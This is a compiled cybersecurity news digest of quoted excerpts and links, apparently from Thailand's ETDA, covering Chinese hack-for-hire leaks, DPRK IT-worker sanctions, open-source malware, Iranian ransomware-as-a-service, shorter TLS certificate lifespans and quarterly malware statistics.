https://www.bleepingcomputer.com/news/security/mands-confirms-social-engineering-led-to-massive-ransomware-attack/ - State Secrets For Sale: More Leaks From The Chinese Hack-For-Hire Industry
"In late May, two particularly interesting Chinese datasets appeared for sale in posts on DarkForums, an English-language data breach and leak forum that has become popular since BreachForums went dark in mid-April. These two posts, which we’re calling the VenusTech Data Leak and the Salt Typhoon Data Leak, had some interesting similarities."
https://spycloud.com/blog/state-secrets-for-sale-chinese-hacking/
https://www.bankinfosecurity.com/chinese-data-leak-reveals-salt-typhoon-contractors-a-28919
General News
- Exposure Management Is The Answer To: “Am I Working On The Right Things?”
"In this Help Net Security interview, Dan DeCloss, Founder and CTO at PlexTrac, discusses the role of exposure management in cybersecurity and how it helps organizations gain visibility into their attack surface to improve risk assessment and prioritization. He also explains how PlexTrac’s platform streamlines the reporting process and enables teams to collaborate more effectively to speed up remediation. DeCloss looks forward to widespread adoption of Continuous Threat Exposure Management, believing it will help close the gap on unidentified vulnerabilities through continuous, contextual, and risk-informed security programs."
https://www.helpnetsecurity.com/2025/07/08/dan-decloss-plextrac-exposure-management-strategy/ - Cyberattacks Are Changing The Game For Major Sports Events
"Sports fans and cybercriminals both look forward to major sporting events, but for very different reasons. Fake ticket sites, stolen login details, and DDoS attacks are common ways criminals try to make money or disrupt an event. Events like the FIFA World Cup, the Olympics, and major sports leagues pull in millions of viewers. The 2026 FIFA World Cup is expected to draw over 5.5 million fans in person, with 6 billion more engaging worldwide with the newly expanded 48-team tournament, generating massive online traffic across platforms such as ticketing, betting, streaming, and merchandise sales."
https://www.helpnetsecurity.com/2025/07/08/sport-events-cybercrime/ - CISOs Urged To Fix API Risk Before Regulation Forces Their Hand
"Most organizations are exposing sensitive data through APIs without security controls in place, and they may not even realize it, according to Raidiam. Their report, API Security at a Turning Point, draws on a detailed assessment of 68 organizations across industries. It deliberately excludes regulated environments like UK Open Banking, where advanced security is mandated. The goal was to understand how typical businesses, those without regulatory pressure, are protecting their APIs. The results aren’t encouraging."
https://www.helpnetsecurity.com/2025/07/08/report-enterprise-api-security-risks/ - Combolists And ULP Files On The Dark Web: A Secondary And Unreliable Source Of Information About Compromises
"Combolists and URL-Login-Password (ULP) files have existed since the earliest user data leaks. These files offer a convenient format for storing and distributing compromised credentials — typically just a username (or email) and password — where all “unnecessary” information is removed. It’s simplicity makes them ideal tools for cybercriminals launching attacks such as credential stuffing, phishing, and other forms of account-based exploitation. With the advent of modern infostealers, stealing login credentials has become easier and more automated than ever. At the same time, distributing stolen data has been simplified through platforms like dark web forums, file-sharing services, and Telegram channels."
https://www.group-ib.com/blog/combolists-ulp-darkweb/ - Sanctions Imposed On DPRK IT Workers Generating Revenue For The Kim Regime
"Today, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned Song Kum Hyok, (Song), a malicious cyber actor associated with the sanctioned Democratic People’s Republic of Korea (DPRK) Reconnaissance General Bureau (RGB) hacking group Andariel. Song facilitated an information technology (IT) worker scheme in which individuals, often DPRK nationals working from countries such as China and Russia, were recruited and provided with falsified identities and nationalities to obtain employment at unwitting companies to generate revenue for the DPRK regime. In some cases, these DPRK IT workers have been known to introduce malware into company networks for additional exploitation. OFAC is also sanctioning one individual and four entities involved in a Russia-based IT worker scheme that has generated revenue for the DPRK."
https://home.treasury.gov/news/press-releases/sb0190
https://therecord.media/north-korea-it-worker-scheme-us-sanctions-song-kum-hyok
https://cyberscoop.com/treasury-slaps-sanctions-on-people-companies-tied-to-north-korean-it-worker-schemes/ - Open Source Malware Index Q2 2025: Data Exfiltration Remains a Leading Threat
"In the second quarter of 2025, Sonatype uncovered 16,279 pieces of open source malware, bringing the total number of malicious packages identified by our automated detection systems to 845,204 and counting. Once again, data exfiltration emerged as the dominant tactic, reinforcing a persistent and growing trend in software supply chain attacks targeting developers and CI/CD environments."
https://www.sonatype.com/blog/open-source-malware-index-q2-2025
https://www.darkreading.com/application-security/malicious-open-source-packages-spike
https://www.infosecurity-magazine.com/news/malicious-open-source-surge-188/ - 4 Critical Steps In Advance Of 47-Day SSL/TLS Certificates
"The CA/Browser Forum's decision to reduce SSL/TLS certificate lifespans to just 47 days by 2029 is set to fundamentally change how organizations manage digital trust. While the full impact will unfold over several years, the transition begins much sooner, with certificate validity dropping to 200 days in less than a year (March 2026). This accelerated timeline means IT teams have a small window of time to prepare for these sweeping changes. To navigate this shift successfully and avoid operational disruptions, organizations must focus on a few key steps over the next 100 days."
https://www.darkreading.com/cyberattacks-data-breaches/critical-steps-advance-ssl-tls-certificates - Iranian Ransomware Group Offers Bigger Payouts For Attacks On Israel, US
"An Iranian ransomware gang has ramped up operations amid heightened tensions in the Middle East, offering larger profit shares to affiliates who carry out cyberattacks against Israel and the U.S., researchers said. The group, known as Pay2Key.I2P, is believed to be a successor to the original Pay2Key operation, which has been linked to Iran’s state-backed Fox Kitten hacking group. Fox Kitten has previously carried out cyber-espionage campaigns targeting Israeli and U.S. organizations. According to a new report from cybersecurity firm Morphisec, Pay2Key.I2P has adopted a ransomware-as-a-service model and claims to have collected more than $4 million in payments over the past four months."
https://therecord.media/iran-ransomware-group-pay2keyi2p-israel-us-targets
https://engage.morphisec.com/hubfs/Pay2Key_Iranian_Cyber_Warfare_Targets_the_West_Whitepaper.pdf - June 2025 Trends Report On Phishing Emails
"This report provides the distribution quantity, statistics, trends, and case information on phishing emails and email threats collected and analyzed for one month in June 2025. The following are some statistics and cases included in the original report."
https://asec.ahnlab.com/en/88919/ - Statistics Report On Malware Targeting Windows Database Servers In The Q2 2025
"The AhnLab SEcurity intelligence Center (ASEC) analysis team is responding to and categorizing attacks targeting MS-SQL and MySQL servers installed on Windows operating systems using the AhnLab Smart Defense (ASD) infrastructure. This post covers the damage and statistics of attacks that occurred on MS-SQL and MySQL servers in the second quarter of 2025 based on the logs. It also classifies the malware used in each attack and provides detailed statistics."
https://asec.ahnlab.com/en/88920/ - Statistics Report On Malware Targeting Windows Web Servers In Q2 2025
"AhnLab SEcurity intelligence Center (ASEC) is responding to and categorizing attacks targeting poorly managed Windows web servers by utilizing their AhnLab Smart Defense (ASD) infrastructure. This post will cover the damage status of Windows web servers that have become attack targets and the statistics of attacks launched against these servers, based on the logs identified in the second quarter of 2025. It will also provide detailed statistics by categorizing the malware strains used in each attack."
https://asec.ahnlab.com/en/88925/ - Statistics Report On Malware Targeting Linux SSH Servers In Q2 2025
"AhnLab SEcurity intelligence Center (ASEC) is using a honeypot to respond to and categorize brute-force and dictionary attacks that target poorly managed Linux SSH servers. This post covers the status of the attack sources identified in logs from the second quarter of 2025 and the statistics of attacks performed by these sources. It also classifies the malware used in each attack and provides detailed statistics."
https://asec.ahnlab.com/en/88927/
อ้างอิง
Electronic Transactions Development Agency(ETDA) - Emerson ValveLink Products